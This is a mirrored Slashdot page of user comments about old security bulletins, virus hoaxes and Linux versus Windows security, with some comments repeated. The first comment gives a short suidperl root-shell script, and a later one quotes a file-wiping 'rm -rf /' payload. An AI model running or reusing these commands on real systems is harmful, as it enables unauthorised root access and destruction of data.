Slashdot Mirror

This reminds me of the notorious suidperl vulnerability from back in the day. In a nutshell, you could use the following code to achieve a root shell from an unprivileged account (apologies if I don't get it exactly right... I don't have an ancient system to verify on):

#!/usr/bin/suidperl -w
 
$< = 0;
$> = 0;
 
`/bin/bash`;

It was internet cleanup day. The white house, unfortunately, forgot to disconnect their network from the internet.

Lynx has its problems as well...
http://www.ciac.org/ciac/bulletins/h-82.shtml
http://securitydot.net/vuln/exploits/vulnerabilities/articles/14814/vuln.html

I wouldn't even go that far. Just assume theres another exploit similar to the WMF picture exploit.

Want to trojan them? Throw something in the data that will buffer overflow something parsing the data and execute code for you. You might not even need them to open it when you consider things like Desktop Search and similar features willingly parsing all the data on your harddrive with potentially vulnerable(or backdoored..) parsers.

I understand the premise of what you're saying, but you're not quite right on this. DNS poisoning is only a problem if the client software (web browser) has a vulnerable implementation of SSL validation (modern browsers do not suffer from such a problem). To quote an excerpt from a securtiy bulletin detailing a weakness in Netscape 4.7 series SSL validation routines (source: http://www.ciac.org/ciac/bulletins/k-040.shtml):

------- BEGIN QUOTED SECTION ----------

A simple attack (called web-spoofing) on this system is to attack the DNS server and "poison" its entry for www.e-bank.com with attacker's IP address 99.99.99.99. Attacker sets up a web server at 99.99.99.99 that web-wise looks exactly like the original www.e-bank.com server. User trying to connect to www.e-bank.com will now instead connect to the attacker's server and provide it with his one-time password. Attacker's server will use this password to connect to the real server at 100.100.100.100 and transfer all of the user's money to his secret Swiss bank account ;-).

This attack is successfully disabled by using SSL protocol. In that case, when browser falsely connects to www.e-bank.com at 99.99.99.99 rather than to 100.100.100.100, attacker's server must provide a valid certificate for www.e-bank.com, which it can't unless the attacker has stolen the secret key and the certificate from the real server. Let's look at three possibilities:

1) Attacker could issue a certificate for www.e-bank.com himself (on his own CA). That wouldn't work since his CA is not trusted by user's browser.
2) Attacker could use a stolen expired key and certificate (those are often not protected as strongly as valid ones since one could think they can't be used any more). That wouldn't work since browser will notice that certificate is expired.
3) Attacker could use a valid key and certificate for some other site (e.g. www.something.org). That wouldn't work since browser will accept only valid certificates for www.e-bank.com.
It would seem that this problem of web-spoofing is successfully solved with SSL certificates.

------- END QUOTED SECTION ----------

Again, SSL effectively blocks against the majority of reasonably effected spoofing problems these days, as long as (1) large primes remain hard to factor, and (2) client SSL client libraries are well written.

"Yes, the drive is formatted, but I have never heard of a virus that lives in the master boot record."

actually, MS Office for Mac does something similar. It broadcasts version information to your subnet. All other copies listen and will shut down if they use the same license.

http://www.ciac.org/ciac/techbull/CIACTech02-003.s html

Linux doesn't by itself save you from cross-platform vectors. Flash on Linux has had exploitable problems. PDF viewers for Linux have had buffer overflows and (2003)If a victim clicks on a malicious hyperlink, an attacker could execute arbitrary shell commands with the victim's privileges. Linux makes it harder to run executable machine code by mistake but that covers only part of the perimeter.

I don't like to see people hurt by using Windows, and also don't like to see people hurt by overconfidence.

That would be the Good Times virus. (Warning: don't click on that ... ooooh too late.)

And that is relevent to this discusion because...

They work on a schedule because that's the only way you can do a software project of any size[SNIP]

I actually work for Sun.[SNIP]

You're a solaris programmer? Manager? I don't run or administer Sun systems for a few years now, but that is certainly not how I remember them releasing security updates? When did you guys change practices? That should be some interesting conversations at the next USENIX meeting. I would like some more info on when they went to this model if you have it - was it before or after Microsoft decided to do so?

1. No fecking media support! I get XMMS inform me on first attempt at playing an MP3 that it won't because of licensing conflict. Wtf? Codecs for avi's and DVDs were a simular story; all had to be downloaded via yum (bloody excellent tool!). Seriously; not good, but fixed in the end.

Alas, blame the law. The US allows software patents. Software patents means that codecs like mp3, mpeg2, ac3 etc etc are patented, and they can only be distributed if licence fees are paid by the distro. Since fedora is distributed free, they can't pay the licence fees, and they don't want to get sued if they distribute the distro in the US, so the only option is to host the codec packages outside the US where the patents don't apply, and you get them yourself. Note, Windows doesn't come with DVD playback out of the box for the same reason. If you want codecs and other patented software out of the box, you need to pay for a distro, and the US codec licence fees will be paid for out of your purchase price. No way round this, short of getting US patent law reformed.

2. Why the hell do I have to install a new kernel? Why? I've never had to on Windows - why is Linux different? Is it so buggy? ... 68 cock-ups so great in the kernel build from release-time until that now they had to re-release 68 times?

Two main reasons. First, a lot of the linux drivers are in the kernel, so new kernel versions include improved drivers and ones for new hardware. Second, the linux kernel is adding a lot of extra features and improvements, as well as bugfixes (not even a majority of bugs are security holes, don't forget). Third, windows does indeed get kernel updates, they just get included in Windows Update. Be glad linux is evolving so quickly :)

3. Point 2 also breaks my nvidia drivers. I don't want to re-compile new drivers everytime there's a new 'patch'. For the love of god, why?!

Nvidia don't want to release open-source drivers. They have a great big chunk of closed driver, with a 'shim' that links that binary code to a particular kernel. The kernel is updated, the shim needs to be redone for your particular kernel. Admittedly, the linux devs don't exactly make life easy for nvidia to do it this way. Chalk it up to the conflict between the open-source and closed-source world. Still, life isn't exactly rosy in the closed-source world either, I've lost count of the times I've needed to update drivers on windows to fix some bug or conflict, especially when it comes to video card drivers and PC games. Tell nvidia you'd like proper open-source drivers for the hardware you paid for...

4. X-Windows. What a mess. Why do I have to tell it my x & y refresh rates for my monitor? Windows just 'knows'. Many more things here I feel that X-Windows should just 'know' - the number of buttons on my USB mouse for-instance. If Windows can do it, there's no reason why Linux can't. Also, X-Windows 'feels' slower than Windows. I'm sure there's good reasons for this, but I don't care; Windows is snappier.

Agreed on the Xorg config problems. Largely a hold-over from a long period of political infighting, now resolved. Xorg is rapidly improving, and many features are coming in now that have been held up for years. The slowness is probably down to a slight problem with the config (possibly the openGL parts) - properly setup, I find Xorg quicker than windows. Still, it should be easier to 'automagically' configure it than it is - too many times I've had to fix an Xorg setup manually.

5. Lack of decent file-browser. The best I've come across is Nautilus in a mode that resembles Windows Explorer. It'll do for now, but as far as I'm aware, offers no context-sensitive menus for applications (like the Winamp "Play in Winamp" right-click menu on fo

Almost immediatly eh? So then what's up with the entry in the CVE stating it was "assigned 20051220" -- nearly a month ago?

...and yes, I'm almost positive that's supposed to be a date. Besides the fact that other entries have the same datelike format, one can also see that bugs such as Microsoft's WMF Vunerability from December 28th 2005 have matching assigned values (20051228 in this case).

On an aside, I REALLY need to get myself a slashdot account and stop posting anonmyously!

Happy Birthday Joshi!
There, darnit. Now to get on with my life.

Check it out, maybe take this story with a grain of NaCl Hoax

"here we have a 20 year old protocol, a part of the Internet infrastructure that hasn't been touched in 10 years and we were all sure was right, and now is cast in doubt."

Where the hell has this moron been?

http://www.enterprisenetworkingplanet.com/netsecur /article.php/3498286
http://www.ciac.org/ciac/bulletins/h-78.shtml
http://bsd.slashdot.org/article.pl?sid=04/08/28/19 30259&tid=172&tid=7
etc., etc., etc...

That paper is so old, out-of-date, and just plain wrong that I can't believe anyone would ever refer to it. Not to mention the fact that it is simply written as a propaganda piece to push his [Radatti's] own commercial security solution.

Here's just the tip of the iceberg:

1) the paper is 10 years old. The world of UNIX & computer security has changed quite a bit since then. His 2nd paragraph states "Therefore, the problems experienced today are good indicators of the problems and the solutions that will be experienced in the future, no matter which operating system becomes predominate." It's been 10 years - when are we supposed to start seeing all these problems with Unix viruses? Just like NT? It's laughable.

2) throughout the whole paper he can only name one Unix virus: Unix Usenix Virus (aka AT&T Attack Virus). According to CIAC, that was a research project and not a virus seen in the wild.

3) from the very beginning he conflates all types of malware: "The first computer viruses created were on Unix systems. The Internet Worm, Trojan Horses and Logic Bombs are all ignored milestones in this belief." That was almost to be expected back then. Computer security was not as well understood or formalized back then. However, this book, written in modern times, is about modern viruses. The old vague definition no longer applies.

?) finally, the sheer number of simple errors - factual, grammar, spelling - is just mindboggling. The very first sentence states: "zealous in their believe that". Later on you have this gem: "One of the most favorite payloads observed in the wild is "/bin/rm -rf / >/dev/null 2>&1" This payload will attempt to remove all accessible files on the system as a background process with all messages redirected to waste disposal." - explain how that is a background process?

and on, and on...

rho

80MB is low for Windows XP Professional, yes. Many systems are well over 120MB usage by default.

As regards security - well, Linux is certainly more secure in many ways, but it is simply the case that it is subject to less of the "common" attacks, simply because the attacks are targeted at the largest userbase (Windows).

For example, take a more than cursory look at the US DOE CIAC security bulletins for Red Hat, and Microsoft. Sure MS is worse, and there're probably better Linux distros, but I call foul on the cry that Windows is far and away more insecure. It's simply the case that yes, it's insecure. It's subject to more attack than Linux. Linux also has insecurities, of a reasonable number despite not being as bad or as likely to be attacked.

Make no mistake, I have nothing against Linux, and consider Windows a piece of crud. But there's not much basis for the moral superiority that Linux users often display. It's an alternative, not an obvious replacement (not for all users anyways, so far - whatever about servers and tech users).

80MB is low for Windows XP Professional, yes. Many systems are well over 120MB usage by default.

As regards security - well, Linux is certainly more secure in many ways, but it is simply the case that it is subject to less of the "common" attacks, simply because the attacks are targeted at the largest userbase (Windows).

For example, take a more than cursory look at the US DOE CIAC security bulletins for Red Hat, and Microsoft. Sure MS is worse, and there're probably better Linux distros, but I call foul on the cry that Windows is far and away more insecure. It's simply the case that yes, it's insecure. It's subject to more attack than Linux. Linux also has insecurities, of a reasonable number despite not being as bad or as likely to be attacked.

Make no mistake, I have nothing against Linux, and consider Windows a piece of crud. But there's not much basis for the moral superiority that Linux users often display. It's an alternative, not an obvious replacement (not for all users anyways, so far - whatever about servers and tech users).

I think that any case where a network driver will contain a flaw exploitable by stuff sent over the network will be quite rare.

Are you sure?

the CIAC site has a copy as well, along with another version that someone wrote.

the CIAC site has a copy as well, along with another version that someone wrote.

the CIAC site has a copy as well, along with another version that someone wrote.

Funny, CIAC Issued a warning about BHO's in early 2002 Link to warning

The idea is to make people feel stupid for being a part of the chain letter, not to insult them.

This works for me as well. I usually refer them to the following hoax busting sites:

Snopes
Urban Legends
Symantec Hoax Warnings ("$800 from Microsoft" is listed first on this page!
Hoaxbusters
VMyths

If more gullible journalists and people would think a little and do some simple, quick research before hitting the SEND button then we'd all be a lot better off.

"Helium causes death??? Come on; get real. Helium is an inert gas (if you don't know what inert means, look it up). It is not a poison and it cannot hurt you by breathing it. Divers use a mixture of helium and oxygen when they go deep because pressurized nitrogen is poisoness. The only way that helium could hurt you is if you were breathing pure helium (no oxygen). You would pass out and eventually die from a lack of oxygen not from any property of helium. This is true of any gas that you might breath that does not contain oxygen.

If you are sucking on a helium filled balloon and start to get light headed, just pull the balloon out of your mouth and take a breath of normal air. If you don't stop sucking on the balloon when you get light headed, you will probably drop it when you pass out and the problem will fix itself."

Please stop spouting Urban Legends that have no validity.

More information on this at HoaxBusters

More information on this at HoaxBusters

Sorry, but you're wrong. Windows NT has its architectural roots in VMS, not MS-DOS.

And since you're in need of a history lesson: the RTM worm spread via email (sort of) on Unix systems, and several Unix/Linux virus and worms have been discovered in the wild - Lion which spreads via a vulnerability in BIND, Bliss which infects ELF executables, Sadmind aka PoizonBox which targets both Solaris/sadmind and Windows/IIS, Staog, etc. Lindose can infect both ELF and PE executables but it's only a proof of concept.

Hell, there were even a few worms and trojans running around on VMS back in the day.

When written by noobs, virus/worms/trojans are a popularity contest, nothing more. When written by those skilled in the art, malicious mobile code is about risk management, engineering costs, and return on investment. Thus endeth the lesson.

*plonk*

(I was going to moderate this guy's post up, but since no one else has educated this newbie, I guess I'll have to leave the positive moderation to someone else.)

Honestly, is amazes me that people fall for crap like this. It always reads like someone in bulgaria wrote it with with an English/Bulgarian dictionary. My favorite misspellings/miswordings are "asterik" and "social insurance number".

AOL Billing center sample page.

So, you freely admit that Windows Update collects more than is specified on their privacy page. (Denoted by the legal "information includes") "Windows Update also collects the Product ID and Product Key to confirm that you are running a validly licensed copy of Windows." - This is an admission that they don't really let you know what they're collecting, as it does not appear in the "information includes" section.

"To provide you with the appropriate list of updates, Windows Update must collect" Must?? Read on up the list. They choose to have that information sent to them for processing rather than send their informatioon to you for processing. There is no "must" involved. Unless this is another admission that The Windows dev team is not bright enough to have figured out how to do it any other way.

The HCL is huge, but if there was a copy loaded on install, with the versions, etc. current up to pressing, then simple diffs could be downloaded upon each connect. Even without this mechanism, a download of possible updates would not be prohibitively huge.

They want the titles of any file played in Media Player why??? They don't have to let you know that they do that why?? As Bush and Cheney will tell you, this is a pattern of behaviour. Another episode of a bad soap opera, and we know how it will end. XP phones home 18 ways out of the box. That doesn't bother you?? look here, and here.

Live in darkness if you must...

Hammy

"The person you have reached has been connected and is unavailable at this time."

I used to get a lot of these. First find a case of that letter on a anti hoax site saying that it is a hoax. Reply and tell them they have been hoaxed. If they are forwarding it to a lot of people then forward the anti-hoax information as well. Having backup from a anti-hoax site reinforces your statement and they will look like an ass and think twice before sending such letters again.

Some Anti-hoax sites
Hoax Busters
Virus Myths
Just search on google for urban legends and you will get more sites.

• Congress to Block Imaginary Internet Tax Bill from the Washington Post
• E-mail Rumor Completely Untrue from the United States Postal Service
• E-mail Tax Hoax from the US Department of Energy's Computer Incident Advisory Capability
• No Consumer Per-Minute Charges to Access ISPs from the Federal Communications Commission

I hate to say this, but the idea of doing this in the Phillipines (especially the imposition by a non-Phillipine organization) makes the the referenced newspaper article sound like a hoax too.

Oh no, this never happens on OS X.

Don't get me wrong, I rather do not advocate PPTP as the best solution for secure wireless networking. I would opt for something which has proven (or belived) to be more secure, like IPSec.

It's true that the challange/response authentication scheme has been proven to be pretty insecure, mainly because LAN Manager passwords are suffering from significantly weaker encryption than NT passwords, but for backward compatibility reasons both are sent together, always, which makes password guessing way more easy. I figure that is what you refer to as 'breaking keys'. I agree. OTOH, Microsoft released a so-called pptp3-fix, which fixes the LAN Manager password problem. I know there remain a number of other issues, but the main problem has been fixed in there, according to MS and some other sources.

Still, I am no fan of PPTP. But sometimes, admins face needs which force them to make compromises...

Alas, reverting to 2400 bps modems will only make you vulnerable to the world's worst computer virus yet.

That virus distributes itself on the modem sub-carrier present in all 2400 baud and up modems.

Read the rest here, but rest assured, "those who use 300 and 1200 baud modems should be immune".

When we finally open source these trojans, our software will become more secure because programmers from around the world can work on making the trojans and the programs the effect faster, better, and more secure.

Do you have kadmind4 installed, though?

I have access to several boxes, all with Kerberos 5 on them, but none of them have kadmind4 (not in any bin directories or in inetd, at least).

If you do have kadmind4, go to CIAC.

Specifically, go here

Do you have kadmind4 installed, though?

I have access to several boxes, all with Kerberos 5 on them, but none of them have kadmind4 (not in any bin directories or in inetd, at least).

If you do have kadmind4, go to CIAC.

Specifically, go here

The patch is available here.

Ok, how about ...

A PC Gamer CD with a virus in Q-Paint

Another magazine's CD (Developers Review) was infected with a macro virus

PK Zip V3 (gee, this sounds rather familar)

A Mac virus found on the Journal of Vacuum Science & Technology CD-ROM Vol.12 1Q94

And...

Slashdot even did a story about a spyware program that removed Ad-Aware (Trojan)...and this was done by the author!!!

I'm sure if you look around for a while, you can find more. Just do a search on Google...only took me a few minutes to find these.

External audits are good because they bring in experts who focus on finding vulnerabilities in your network. These experts will come armed with a variety of vulnerability assessment tools to perform their audit. The only problem is that it will almost always happen less frequently than vulnerabilities are discovered, so this should only be 1 part of the overall solution.

You should adopt this practice internally, because if the tools are set up to check for vulnerabilities, you can be much more proactive about finding them than simply by scheduling consultants to come every few weeks, months, year. There are a variety of tools available, both freely and commercially.

A good tool will be updated frequently, check a lot of bugs, including the most critical (SANS Top 20, BugTraq, CERT.

Free Tools
SATAN -- Security Administrator Tool for Analyzing Networks
SAINT -- Security Administrator's Integrated Network Tool -- based on SATAN, GNU
SARA -- Security Auditor's Research Assistant -- similar to SATAN/SAINT check the Freshmeat page
NESSUS -- another free tool

Commercial Tools
ISS has a variety of tools avaiable depending on your needs
NeXpose -- try the free demo, great ui, demo only lets you assess 1 IP at a time though :( Here is a review
A Networking Computing article on Vulnerability Assessment tools. Reviews many of the major vendors (so I won't list them all). Includes some of the free tools.
Here is another overview of security tools to get you started.

Hoaxbusters is a pretty good site for just that. It just doesn't get much press.

here

and here

It's interesting that you refer to WEP as being a "cat and mouse" game but don't want to admit that SSH1 was largely the same thing, as summed up in http://www.openssh.com/goals.html

just why do you think we have ssh1 (1.3) and ssh1 (1.5) and, for that matter, ssh2? regardless of implementation details (and for that matter, nobody's perfect) the ssh1 protocol had problems.

Re SSLv2: ciphersuite rollback attack is bad news. read the background section of http://www.counterpane.com/ssl.html

point being, sure WEP may have flaws, but then again, flaws have also been discovered in those other great "never need to upgrade" protocols you mention.

How about holding various companies whose products are exploited the most (re: MS) liable for their lack of security?

There was a recent security seminar sponsored by the Georgia Tech Information Security Center by Gene Spafford who is the director of the Purdue CERIAS (Center for Education and Research in Information Assurance and Security), where he mentioned the problems with security and the software industry. One of his slides in his presentation showed that Windows NT and Windows 2000 (combined), RedHat Linux and Solaris are respectively the first, second and third on the lists of OSes that have had vulnerabilities discovered in the past five years.

Legislation that aims to punish companies for writing insecure software would harm almost every company that writes any software that is aimed at being used in a server/multi-user environment since security is an absolute that most non-trivial software does not reach.

Secondly, who will be forced to pay when it comes to Open Source vulnerabilities? wu-ftp is notoriously broken , as is telnetd , sendmail, BIND and some would consider recent bugs in the Linux kernel as OS vulnerabilities. Opening the door to lawsuits to software developers for writing software would probably kill a number of projects rather quickly.

I'd rather that we let capitalism take its course. If customers want secure products then they should stop buying insecure products or they should communicate to the vendors that security is of importance to them. As long as consumers (both individuals and corporate entities) continue to accept the status quo then no change will be made but I don't believe that lawsuits will solve anything except make some lawyers rich and significantly increase the cost of software as the effects of the lawsuits are passed on to consumers.

It's rather interesting watching slashbots make smug comments about "Microsoft worms" and "Outlook viruses" when the two most damaging worms that have occured this year could have appeared on any platform.

Code Red
The Code Red worm is a typical worm that exploits a buffer overflow just like the Morris Internet Worm and the Ramen worm before it. Either of the aformentioned worms could have done what code red did once they had 0wn3d the boxen, they just happened not to.

Heck, I've toyed with writing a proof of concept *nix verison of Code Red using wu-ftp vulnerabilities, rpc.statd vulnerabilities, telnetd vulnerabilities, sendmail vulnerabilities and even BIND vulnerabilities. Of course, I haven't gone much further than deciding what exploits to use and glancing at some source since I'm busy with school at the moment and more importantly I don't want to go to jail.

Sircam
The Sircam worm spread either through social engineering or across unprotected network shares. Neither of these requires Outlook. It didn't grab addresses out of the address book and instead grabbed them from the user's web cache. Sircam also didn't use the client mailer to mail itself out but instead included it's own mail program.
Thus all Sircam needed to spread was clueless users. This only thing Microsoft-y about this worm is that it ran on Windows.

All the above said, it is truly sad that on almost all popular platforms we are stil dealing with a 30 year old security problem whose causes and solutions have been known from probably before a sizable number of the slashdot population was born.

It's rather interesting watching slashbots make smug comments about "Microsoft worms" and "Outlook viruses" when the two most damaging worms that have occured this year could have appeared on any platform.

Code Red
The Code Red worm is a typical worm that exploits a buffer overflow just like the Morris Internet Worm and the Ramen worm before it. Either of the aformentioned worms could have done what code red did once they had 0wn3d the boxen, they just happened not to.

Heck, I've toyed with writing a proof of concept *nix verison of Code Red using wu-ftp vulnerabilities, rpc.statd vulnerabilities, telnetd vulnerabilities, sendmail vulnerabilities and even BIND vulnerabilities. Of course, I haven't gone much further than deciding what exploits to use and glancing at some source since I'm busy with school at the moment and more importantly I don't want to go to jail.

Sircam
The Sircam worm spread either through social engineering or across unprotected network shares. Neither of these requires Outlook. It didn't grab addresses out of the address book and instead grabbed them from the user's web cache. Sircam also didn't use the client mailer to mail itself out but instead included it's own mail program.
Thus all Sircam needed to spread was clueless users. This only thing Microsoft-y about this worm is that it ran on Windows.

All the above said, it is truly sad that on almost all popular platforms we are stil dealing with a 30 year old security problem whose causes and solutions have been known from probably before a sizable number of the slashdot population was born.

Group policy can override the settings in the Internet Services Manager, so disabling Internet Printing via group policy provides greater certainty.

Disabling Internet Printing via the Internet Services Manager can interfere with the operation of Outlook Web Access. Specifically, when you unmap the Internet Printing ISAPI extension via the Internet Services Manager on an Exchange 2000 server, you're prompted whether or not to apply the changes to the child folders, including Exchange, Public, and ExAdmin. If you choose to apply the setting to these child folders, Outlook Web Access will stop functioning until you restart the Exchange System Attendant.

Gee... so if I undo something on the windows panel, it may not be undone because the group properties take precedence over the systemwide settings (doesn't make sense as an implimentation "feature"), and if I disable the option everything else that is bundled into the OS and that relies on that package will break (makes sense, but is equally scary). Makes me happy I run Win98SE and Linux.

Here's a few, mostly virus-related links (some are a little outdated):

www.quackwatch.com
hoaxbusters.ciac.org
urbanlegends.miningco.com/library/blhoax.htm
korova.com/virus/hoax_index.htm
www.vmyths.com